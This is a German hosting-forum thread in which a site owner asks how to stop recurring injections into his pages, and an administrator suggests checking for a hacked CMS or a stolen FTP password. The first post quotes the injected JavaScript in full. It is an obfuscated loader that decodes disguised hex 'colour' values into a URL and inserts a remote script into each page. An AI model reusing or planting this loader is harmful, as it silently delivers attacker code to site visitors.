Abuse Angriffe auf verschiedene Seiten

#1
Hallo,

ich habe zur Zeit das Problem, dass ich einige Abuse Angriffe habe. Es steht jedesmal folgender Code auf einmal in der Seite

Code:
<script type="text/javascript">
if (typeof(redef_colors)=="undefined") {

   var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e4745', '#3d4444', '#3d4043', '#3f3d41', '#3f423e', '#79823e', '#798084', '#748188', '#3d7c78', '#7d3d7f', '#777f31', '#4d0000');
   var redef_colors = 1;
   var colors_picked = 0;

   function div_pick_colors(t,styled) {
        var s = "";
        for (j=0;j<t.length;j++) {      
                var c_rgb = t[j];
                for (i=1;i<7;i++) {
                        var c_clr = c_rgb.substr(i++,2);
                        if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15);
                }
        }
        if (styled) {
                s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
        } else {
                s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
        }
        return s;
   }

   function try_pick_colors() {
        try {
                if(!document.getElementById || !document.createElement){
                        document.write(div_pick_colors(div_colors,1));
                   } else {
                        var new_cstyle=document.createElement("script");
                        new_cstyle.type="text/javascript";
                        new_cstyle.src=div_pick_colors(div_colors,0);
                        document.getElementsByTagName("head")[0].appendChild(new_cstyle);
                }
        } catch(e) { }
        try {
                check_colors_picked();
        } catch(e) { 
                setTimeout("try_pick_colors()", 500);
        }
   }

   try_pick_colors();

}
</script>
Kann mir jemand sagen wie ich das verhindern kann?

Es läuft bei mir aktuell ISPConfig Version: 2.2.38.

Vielen Dank für alle Tipps.

Gruß
Benny
 

Till

Administrator
#2
Erstmal musst Du rausinden wie die Angriffe passieren, also ob das in der Seite installirte CMS gehackt wurde oder ob der Angreifer an das FTP Passwort gekommen ist. Wenn der Angriff über ein ausgespähtes FTP Passwort passiert ist, dann musst Du dazu FTP Logins im log finden. Welche CMS Systeme und Versionen kommen denn in den Seiten zum Einsatz?
 

Werbung

Top